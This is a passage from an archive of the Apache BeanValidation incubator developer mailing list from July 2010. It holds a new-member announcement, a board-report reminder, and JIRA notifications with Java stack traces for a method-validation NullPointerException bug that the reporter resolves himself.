online. From [email protected] Wed Jul 07 15:38:44 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34257 invoked from network); 7 Jul 2010 15:38:44 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 7 Jul 2010 15:38:44 -0000 Received: (qmail 51164 invoked by uid 500); 7 Jul 2010 15:38:44 -0000 Delivered-To: [email protected] Received: (qmail 51123 invoked by uid 500); 7 Jul 2010 15:38:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 51114 invoked by uid 99); 7 Jul 2010 15:38:44 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jul 2010 15:38:44 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL,UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp104.prem.mail.ac4.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 07 Jul 2010 15:38:36 +0000 Received: (qmail 89729 invoked from network); 7 Jul 2010 15:38:15 -0000 Received: from drwoods.local ([email protected] with plain) by smtp104.prem.mail.ac4.yahoo.com with SMTP; 07 Jul 2010 08:38:15 -0700 PDT X-Yahoo-SMTP: sCI.ryiswBB7FW.DxjU523c87MI- X-YMail-OSG: _UxdPtYVM1nIOByIK9VUAWBe84aJ_h2Yk_Dtnv3yBfAPoes I5PfIt44os.u.4ykcHcPGyFe5cfQ2tqKkBsvKWbyoq5e1jO_cNGgTnx.opOy 79BvV_eqA_DjjuJFETdfpWa76QAxKvZdWqRwFDuzoy4di5hpgCKGO1nF6UJY SOCR4jFeChHvkpTs0i7BKMtJdsIefHLGDQhRwTP_vyUibkXjqOdukTOJpd47 V6LkcCwmehj57pQ14y7BnIDskWUfN6kF3Ud_O87I4t62e_Ym0bNid0ONXTKY - X-Yahoo-Newman-Property: ymail-3 Message-ID: <[email protected]> Date: Wed, 07 Jul 2010 11:38:14 -0400 From: Donald Woods <[email protected]> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:161.129.204.104) Gecko/20100608 Lightning/1.0b2 Thunderbird/3.1 MIME-Version: 1.0 To: [email protected] CC: [email protected] Subject: [ANNOUNCE] Welcome Carlos Vara as a new BVAL PPMC member X-Enigmail-Version: 1.1.1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org The BVAL PPMC extended PMC membership to Carlos and he has accepted. Welcome aboard Carlos! -Donald From [email protected] Wed Jul 07 15:40:51 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35010 invoked from network); 7 Jul 2010 15:40:51 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 7 Jul 2010 15:40:51 -0000 Received: (qmail 52450 invoked by uid 500); 7 Jul 2010 15:40:51 -0000 Delivered-To: [email protected] Received: (qmail 52412 invoked by uid 500); 7 Jul 2010 15:40:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 52404 invoked by uid 99); 7 Jul 2010 15:40:50 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jul 2010 15:40:50 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-gy0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jul 2010 15:40:41 +0000 Received: by gyc15 with SMTP id 15so3960217gyc.6 for <[email protected]>; Wed, 07 Jul 2010 08:40:21 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:content-type:mime-version :subject:from:in-reply-to:date:content-transfer-encoding:message-id :references:to:x-mailer; bh=pu9LaSdum7uxcU7be3FLdlhDwc4tRuc48MyYJX5qJaE=; b=QRBLrrhl5uaQE6ILMwAsAsrYsDHeKbZ4Iy460NsFDmzj4Han/9SsYMrJ/H64ed4jor GZf/t2OtWKgx+dYwdhhQBAUmlKdrGasqbZ+4zi9fEr8IGN2b4rI6yJpO0ktEtB4Vr+GI ctHxHzAjZwh5WOKlST5zgHby8NTelZkCR2IPI= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=content-type:mime-version:subject:from:in-reply-to:date :content-transfer-encoding:message-id:references:to:x-mailer; b=rHl57nkBcY6fuIxdwVA2EEfHSo+P3uTOxpPIZAug/6GwljAXRJre4jfST0mhbSZdqp dlJNClBXEu0stH4H3SdIDDMk+cUFzT9Q0kA07cFrLNe4NvSJCEkf/GoKDfXQ7lXMfc6Q 60WDkFdOxQjlmuYfbe/S8iq70/g+tV3mtvNgI= Received: by 161.129.204.104 with SMTP id f19mr4006752qcn.43.1278517220900; Wed, 07 Jul 2010 08:40:20 -0700 (PDT) Received: from [161.129.204.104] ([161.129.204.104]) by mx.google.com with ESMTPS id fb41sm29170410qcb.3.2161.129.204.104.40.16 (version=TLSv1/SSLv3 cipher=RC4-MD5); Wed, 07 Jul 2010 08:40:20 -0700 (PDT) Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 (Apple Message framework v1081) Subject: Re: [ANNOUNCE] Welcome Carlos Vara as a new BVAL PPMC member From: Matt Benson <[email protected]> In-Reply-To: <[email protected]> Date: Wed, 7 Jul 2010 10:39:51 -0500 Content-Transfer-Encoding: 7bit Message-Id: <[email protected]> References: <[email protected]> To: [email protected] X-Mailer: Apple Mail (2.1081) X-Virus-Checked: Checked by ClamAV on apache.org Congratulations, Carlos! -Matt On Jul 7, 2010, at 10:38 AM, Donald Woods wrote: > The BVAL PPMC extended PMC membership to Carlos and he has accepted. > Welcome aboard Carlos! > > -Donald From [email protected] Wed Jul 07 16:02:56 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41552 invoked from network); 7 Jul 2010 16:02:56 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 7 Jul 2010 16:02:56 -0000 Received: (qmail 82332 invoked by uid 500); 7 Jul 2010 16:02:56 -0000 Delivered-To: [email protected] Received: (qmail 82305 invoked by uid 500); 7 Jul 2010 16:02:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 82297 invoked by uid 99); 7 Jul 2010 16:02:55 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jul 2010 16:02:55 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL,UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp107.prem.mail.ac4.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 07 Jul 2010 16:02:47 +0000 Received: (qmail 11698 invoked from network); 7 Jul 2010 16:02:26 -0000 Received: from drwoods.local ([email protected] with plain) by smtp107.prem.mail.ac4.yahoo.com with SMTP; 07 Jul 2010 09:02:26 -0700 PDT X-Yahoo-SMTP: sCI.ryiswBB7FW.DxjU523c87MI- X-YMail-OSG: vHA3wz0VM1m0Cf5aOA5uhu.yX.PaAyFK3IYQkf2y0qXvCgc nUOjWIgNHiyhPHSLSoJdT_1TXTdTy7O7QAZWoSUKoL1ExNK7Thivq4sG4w_q n3nDcyiG4VZPaYiZRA3ewWGoZaCYieG.z4LsqWbEmafe3GDf6v5Usq_BkZ9I xaBKpS8uZfLT7tO5Igg4fb0qUWbL5JIfoE4eJVUXg0VOPlE46jgCDW.AGP2_ aQVFZCHGZAQq_LdaOdmOX37KdLG2.zFGwVqttpcdSV42RGev2oIqUxrcdETl XjelocN9AIuyrYawjCR3IUei5TZ7PYg-- X-Yahoo-Newman-Property: ymail-3 Message-ID: <[email protected]> Date: Wed, 07 Jul 2010 12:02:25 -0400 From: Donald Woods <[email protected]> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:161.129.204.104) Gecko/20100608 Lightning/1.0b2 Thunderbird/3.1 MIME-Version: 1.0 To: [email protected] Subject: Re: Incubator PMC/Board report for July 2010 ([email protected]) References: <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 1.1.1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org I've created an initial report on our wiki at - https://cwiki.apache.org/confluence/display/BeanValidation/2010-07+%28July%29 Please review and update as needed. -Donald On 7/1/10 10:00 AM, [email protected] wrote: > Dear BeanValidation Developers, > > This email was sent by an automated system on behalf of the Apache Incubator PMC. > It is an initial reminder to give you plenty of time to prepare your quarterly > board report. > > The board meeting is scheduled for . The report > for your podling will form a part of the Incubator PMC report. The Incubator PMC > requires your report to be submitted one week before the board meeting, to allow > sufficient time for review. > > Please submit your report with sufficient time to allow the incubator PMC, and > subsequently board members to review and digest. Again, the very latest you > should submit your report is one week prior to the board meeting. > > Thanks, > > The Apache Incubator PMC > > Submitting your Report > ---------------------- > > Your report should contain the following: > > * Your project name > * A brief description of your project, which assumes no knowledge of the project > or necessarily of its field > * A list of the three most important issues to address in the move towards > graduation. > * Any issues that the Incubator PMC or ASF Board might wish/need to be aware of > * How has the community developed since the last report > * How has the project developed since the last report. > > This should be appended to the Incubator Wiki page at: > > http://wiki.apache.org/incubator/July2010 > > Note: This manually populated. You may need to wait a little before this page is > created from a template. > > Mentors > ------- > Mentors should review reports for their project(s) and sign them off on the > Incubator wiki page. Signing off reports shows that you are following the > project - projects that are not signed may raise alarms for the Incubator PMC. > > Incubator PMC > > From [email protected] Wed Jul 07 17:58:45 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 80685 invoked from network); 7 Jul 2010 17:58:45 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 7 Jul 2010 17:58:45 -0000 Received: (qmail 94746 invoked by uid 500); 7 Jul 2010 17:58:45 -0000 Delivered-To: [email protected] Received: (qmail 94714 invoked by uid 500); 7 Jul 2010 17:58:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 94706 invoked by uid 99); 7 Jul 2010 17:58:45 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jul 2010 17:58:45 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jul 2010 17:58:42 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o67HooT9003175 for <[email protected]>; Wed, 7 Jul 2010 17:50:50 GMT Message-ID: <26056095.242201278525050689.JavaMail.jira@thor> Date: Wed, 7 Jul 2010 13:50:50 -0400 (EDT) From: "David J. M. Karlsen (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (BVAL-72) NPE when doing methodvalidation In-Reply-To: <18948177.122061277844170577.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-72?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12886003#action_12886003 ] David J. M. Karlsen commented on BVAL-72: ----------------------------------------- Great - now I can drop the separate commons lang call to find it by name and parameters and reflection. However I still do not get the anticipated result on the returnAspect. Attaching a full .zip of a maven project where I've isolated the aspect w/test and spring. > NPE when doing methodvalidation > ------------------------------- > > Key: BVAL-72 > URL: https://issues.apache.org/jira/browse/BVAL-72 > Project: BeanValidation > Issue Type: Bug > Components: jsr303 > Affects Versions: 0.2-incubating > Environment: JDK 1.5, spring 3.0.3 > Reporter: David J. M. Karlsen > Assignee: Carlos Vara > Attachments: bval72.zip > > > I get an npe when calling this annotated method (the annotations are on the implementation class - not on the interface): > findUser( @Size( min=1 ) String param1, > @NotNull String param2, > @NotNull SomeClass param3 ) > It ends up not findin a MethodDescriptor, this it's null when attempting to call method validation. > {noformat} > java.lang.NullPointerException > at org.apache.bval.jsr303.extensions.MethodValidatorImpl.validateParameters(MethodValidatorImpl.java:86) > at com.edb.payment.pays.core.util.aop.validation.ValidationAspect.validate(ValidationAspect.java:67) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) > at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) > at java.lang.reflect.Method.invoke(Method.java:592) > at org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethodWithGivenArgs(AbstractAspectJAdvice.java:621) > at org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethod(AbstractAspectJAdvice.java:603) > at org.springframework.aop.aspectj.AspectJMethodBeforeAdvice.before(AspectJMethodBeforeAdvice.java:39) > at org.springframework.aop.framework.adapter.MethodBeforeAdviceInterceptor.invoke(MethodBeforeAdviceInterceptor.java:49) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.transaction.interceptor.TransactionInterceptor.invoke(TransactionInterceptor.java:110) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.aop.interceptor.ExposeInvocationInterceptor.invoke(ExposeInvocationInterceptor.java:89) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:202) > at $Proxy21.findUser(Unknown Source) > at com.edb.payment.pays.core.service.user.UserServiceImplTest.findUserThatExists(UserServiceImplTest.java:27) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) > at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) > at java.lang.reflect.Method.invoke(Method.java:592) > at org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:44) > at org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:15) > at org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:41) > at org.junit.internal.runners.statements.InvokeMethod.evaluate(InvokeMethod.java:20) > at org.springframework.test.context.junit4.statements.RunBeforeTestMethodCallbacks.evaluate(RunBeforeTestMethodCallbacks.java:74) > at org.springframework.test.context.junit4.statements.RunAfterTestMethodCallbacks.evaluate(RunAfterTestMethodCallbacks.java:82) > at org.springframework.test.context.junit4.statements.SpringRepeat.evaluate(SpringRepeat.java:72) > at org.springframework.test.context.junit4.SpringJUnit4ClassRunner.runChild(SpringJUnit4ClassRunner.java:240) > at org.junit.runners.BlockJUnit4ClassRunner.runChild(BlockJUnit4ClassRunner.java:50) > at org.junit.runners.ParentRunner$3.run(ParentRunner.java:193) > at org.junit.runners.ParentRunner$1.schedule(ParentRunner.java:52) > at org.junit.runners.ParentRunner.runChildren(ParentRunner.java:191) > at org.junit.runners.ParentRunner.access$000(ParentRunner.java:42) > at org.junit.runners.ParentRunner$2.evaluate(ParentRunner.java:184) > at org.springframework.test.context.junit4.statements.RunBeforeTestClassCallbacks.evaluate(RunBeforeTestClassCallbacks.java:61) > at org.springframework.test.context.junit4.statements.RunAfterTestClassCallbacks.evaluate(RunAfterTestClassCallbacks.java:70) > at org.junit.runners.ParentRunner.run(ParentRunner.java:236) > at org.springframework.test.context.junit4.SpringJUnit4ClassRunner.run(SpringJUnit4ClassRunner.java:180) > at org.eclipse.jdt.internal.junit4.runner.JUnit4TestReference.run(JUnit4TestReference.java:49) > at org.eclipse.jdt.internal.junit.runner.TestExecution.run(TestExecution.java:38) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:467) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:683) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.run(RemoteTestRunner.java:390) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.main(RemoteTestRunner.java:197) > {noformat} -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Wed Jul 07 18:00:48 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81429 invoked from network); 7 Jul 2010 18:00:48 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 7 Jul 2010 18:00:48 -0000 Received: (qmail 99165 invoked by uid 500); 7 Jul 2010 18:00:48 -0000 Delivered-To: [email protected] Received: (qmail 99133 invoked by uid 500); 7 Jul 2010 18:00:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 99125 invoked by uid 99); 7 Jul 2010 18:00:48 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jul 2010 18:00:48 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jul 2010 18:00:45 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o67HqrKF003189 for <[email protected]>; Wed, 7 Jul 2010 17:52:53 GMT Message-ID: <12979639.242251278525173357.JavaMail.jira@thor> Date: Wed, 7 Jul 2010 13:52:53 -0400 (EDT) From: "David J. M. Karlsen (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (BVAL-72) NPE when doing methodvalidation In-Reply-To: <18948177.122061277844170577.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-72?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] David J. M. Karlsen updated BVAL-72: ------------------------------------ Attachment: bval72.zip example project failing on afterReturning > NPE when doing methodvalidation > ------------------------------- > > Key: BVAL-72 > URL: https://issues.apache.org/jira/browse/BVAL-72 > Project: BeanValidation > Issue Type: Bug > Components: jsr303 > Affects Versions: 0.2-incubating > Environment: JDK 1.5, spring 3.0.3 > Reporter: David J. M. Karlsen > Assignee: Carlos Vara > Attachments: bval72.zip > > > I get an npe when calling this annotated method (the annotations are on the implementation class - not on the interface): > findUser( @Size( min=1 ) String param1, > @NotNull String param2, > @NotNull SomeClass param3 ) > It ends up not findin a MethodDescriptor, this it's null when attempting to call method validation. > {noformat} > java.lang.NullPointerException > at org.apache.bval.jsr303.extensions.MethodValidatorImpl.validateParameters(MethodValidatorImpl.java:86) > at com.edb.payment.pays.core.util.aop.validation.ValidationAspect.validate(ValidationAspect.java:67) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) > at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) > at java.lang.reflect.Method.invoke(Method.java:592) > at org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethodWithGivenArgs(AbstractAspectJAdvice.java:621) > at org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethod(AbstractAspectJAdvice.java:603) > at org.springframework.aop.aspectj.AspectJMethodBeforeAdvice.before(AspectJMethodBeforeAdvice.java:39) > at org.springframework.aop.framework.adapter.MethodBeforeAdviceInterceptor.invoke(MethodBeforeAdviceInterceptor.java:49) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.transaction.interceptor.TransactionInterceptor.invoke(TransactionInterceptor.java:110) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.aop.interceptor.ExposeInvocationInterceptor.invoke(ExposeInvocationInterceptor.java:89) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:202) > at $Proxy21.findUser(Unknown Source) > at com.edb.payment.pays.core.service.user.UserServiceImplTest.findUserThatExists(UserServiceImplTest.java:27) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) > at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) > at java.lang.reflect.Method.invoke(Method.java:592) > at org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:44) > at org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:15) > at org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:41) > at org.junit.internal.runners.statements.InvokeMethod.evaluate(InvokeMethod.java:20) > at org.springframework.test.context.junit4.statements.RunBeforeTestMethodCallbacks.evaluate(RunBeforeTestMethodCallbacks.java:74) > at org.springframework.test.context.junit4.statements.RunAfterTestMethodCallbacks.evaluate(RunAfterTestMethodCallbacks.java:82) > at org.springframework.test.context.junit4.statements.SpringRepeat.evaluate(SpringRepeat.java:72) > at org.springframework.test.context.junit4.SpringJUnit4ClassRunner.runChild(SpringJUnit4ClassRunner.java:240) > at org.junit.runners.BlockJUnit4ClassRunner.runChild(BlockJUnit4ClassRunner.java:50) > at org.junit.runners.ParentRunner$3.run(ParentRunner.java:193) > at org.junit.runners.ParentRunner$1.schedule(ParentRunner.java:52) > at org.junit.runners.ParentRunner.runChildren(ParentRunner.java:191) > at org.junit.runners.ParentRunner.access$000(ParentRunner.java:42) > at org.junit.runners.ParentRunner$2.evaluate(ParentRunner.java:184) > at org.springframework.test.context.junit4.statements.RunBeforeTestClassCallbacks.evaluate(RunBeforeTestClassCallbacks.java:61) > at org.springframework.test.context.junit4.statements.RunAfterTestClassCallbacks.evaluate(RunAfterTestClassCallbacks.java:70) > at org.junit.runners.ParentRunner.run(ParentRunner.java:236) > at org.springframework.test.context.junit4.SpringJUnit4ClassRunner.run(SpringJUnit4ClassRunner.java:180) > at org.eclipse.jdt.internal.junit4.runner.JUnit4TestReference.run(JUnit4TestReference.java:49) > at org.eclipse.jdt.internal.junit.runner.TestExecution.run(TestExecution.java:38) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:467) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:683) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.run(RemoteTestRunner.java:390) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.main(RemoteTestRunner.java:197) > {noformat} -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Wed Jul 07 19:29:15 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16922 invoked from network); 7 Jul 2010 19:29:14 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 7 Jul 2010 19:29:14 -0000 Received: (qmail 5727 invoked by uid 500); 7 Jul 2010 19:29:14 -0000 Delivered-To: [email protected] Received: (qmail 5704 invoked by uid 500); 7 Jul 2010 19:29:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 5696 invoked by uid 99); 7 Jul 2010 19:29:14 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jul 2010 19:29:14 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jul 2010 19:29:11 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o67JSnow004047 for <[email protected]>; Wed, 7 Jul 2010 19:28:50 GMT Message-ID: <29158297.244011278530929919.JavaMail.jira@thor> Date: Wed, 7 Jul 2010 15:28:49 -0400 (EDT) From: "David J. M. Karlsen (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (BVAL-72) NPE when doing methodvalidation In-Reply-To: <18948177.122061277844170577.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-72?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12886038#action_12886038 ] David J. M. Karlsen commented on BVAL-72: ----------------------------------------- Doh - I was a little quick on the ctrl-space :) Didn't notice I had getThis() and not getTarget() case closed! Thanks for the help. > NPE when doing methodvalidation > ------------------------------- > > Key: BVAL-72 > URL: https://issues.apache.org/jira/browse/BVAL-72 > Project: BeanValidation > Issue Type: Bug > Components: jsr303 > Affects Versions: 0.2-incubating > Environment: JDK 1.5, spring 3.0.3 > Reporter: David J. M. Karlsen > Assignee: Carlos Vara > Attachments: bval72.zip > > > I get an npe when calling this annotated method (the annotations are on the implementation class - not on the interface): > findUser( @Size( min=1 ) String param1, > @NotNull String param2, > @NotNull SomeClass param3 ) > It ends up not findin a MethodDescriptor, this it's null when attempting to call method validation. > {noformat} > java.lang.NullPointerException > at org.apache.bval.jsr303.extensions.MethodValidatorImpl.validateParameters(MethodValidatorImpl.java:86) > at com.edb.payment.pays.core.util.aop.validation.ValidationAspect.validate(ValidationAspect.java:67) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) > at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) > at java.lang.reflect.Method.invoke(Method.java:592) > at org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethodWithGivenArgs(AbstractAspectJAdvice.java:621) > at org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethod(AbstractAspectJAdvice.java:603) > at org.springframework.aop.aspectj.AspectJMethodBeforeAdvice.before(AspectJMethodBeforeAdvice.java:39) > at org.springframework.aop.framework.adapter.MethodBeforeAdviceInterceptor.invoke(MethodBeforeAdviceInterceptor.java:49) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.transaction.interceptor.TransactionInterceptor.invoke(TransactionInterceptor.java:110) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.aop.interceptor.ExposeInvocationInterceptor.invoke(ExposeInvocationInterceptor.java:89) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:202) > at $Proxy21.findUser(Unknown Source) > at com.edb.payment.pays.core.service.user.UserServiceImplTest.findUserThatExists(UserServiceImplTest.java:27) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) > 